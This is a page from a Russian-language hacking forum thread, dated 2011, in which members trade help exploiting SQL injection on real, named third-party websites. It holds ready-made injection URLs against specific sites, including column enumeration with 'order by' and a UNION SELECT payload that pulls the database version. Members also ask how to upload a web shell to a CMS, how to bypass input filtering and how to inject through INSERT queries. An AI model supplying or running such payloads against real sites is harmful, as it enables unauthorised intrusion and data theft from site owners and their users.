HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1612 из 2422 « Первая < 6121112151215621602 1608 1609 1610 1611 1612 1613 1614 1615 1616 1622166217122112 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.02.2011, 09:57
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
где в cms bitrix найти адрес сайта в бд и в какой таблице или php файле хранится? (наподобие как в жумла в configuration.php есть адрес сайта)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 23.02.2011, 17:26
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию
WebSite CMS v.2.01 кто знает как залить шелл в этой кмс?
 
Ответить с цитированием

  #3  
Старый 23.02.2011, 20:57
asql
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами: 8014646

Репутация: -3
По умолчанию
http://politec.ru/country.asp?id=2'

возможно ли обойти фильтрацию?

Яндекс тИЦ 1100

Яндекс Rank 5/6

так к слову....
 
Ответить с цитированием

  #4  
Старый 23.02.2011, 21:34
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию
Мб поздно отвечаю, но раньше не мог...

Цитата:
Сообщение от foozzi  
нашол вот такую уязвимость
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'
как ее использовать?
После ордер бай

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,1-- 1

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,10-- 1

Цитата:
Сообщение от Фараон  
Как говорил
Dr.Z3r0
В данном примере фильтровать вообще ничего не нунжно, достаточно преобразовывать в целочисленное значение.



И да, тебе отдельный привет за слитие скуль из приватов других проэктов, ну ты понял.

Ну и как написал выше Redwood там был нарушен синтаксис=/

Цитата:
Сообщение от Redwood  
Эксплуатация:
Код HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
Зачем сортировать перебирая все колонки, если можно сразу указать максимальную?
 
Ответить с цитированием

  #5  
Старый 23.02.2011, 21:35
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию
Цитата:
Сообщение от asql  
http://politec.ru/country.asp?id=2'
возможно ли обойти фильтрацию?
Яндекс тИЦ 1100
Яндекс Rank 5/6
так к слову....
Это не фильтрация, это ошибка в приведении типов данных
 
Ответить с цитированием

  #6  
Старый 23.02.2011, 22:11
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Ребят, первый раз с таким сталкиваюсь и не могу в пост запросе подобрать кол-во полей, все перепробовал пробелы на + /* %20 заменяю ничего понять не могу выдает

Код:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 2
Что делать?
 
Ответить с цитированием

  #7  
Старый 23.02.2011, 22:16
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
это очень на insert похоже
 
Ответить с цитированием

  #8  
Старый 23.02.2011, 22:17
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Помогите вывести версию БД.

http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+
 
Ответить с цитированием

  #9  
Старый 23.02.2011, 22:23
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию
Цитата:
Сообщение от FlaktW  
Помогите вывести версию БД.
http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+
http://www.courthouseforum.com/forums/view.php?id=1060181'+and%20mid(version(),1,1)=5+--+

Вот еще нашел сскулю с выводом. В другом скрипте.

http://www.courthouseforum.com//forums/directory.php?type=judges&state=8617%20and%201!=1% 20union%20select%201,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22
 
Ответить с цитированием

  #10  
Старый 23.02.2011, 22:28
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
2Seravin

Можно пару толковых линков по эксплуатации sql inj в инсерт?
 
Ответить с цитированием
Ответ
Страница 1612 из 2422 « Первая < 6121112151215621602 1608 1609 1610 1611 1612 1613 1614 1615 1616 1622166217122112 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.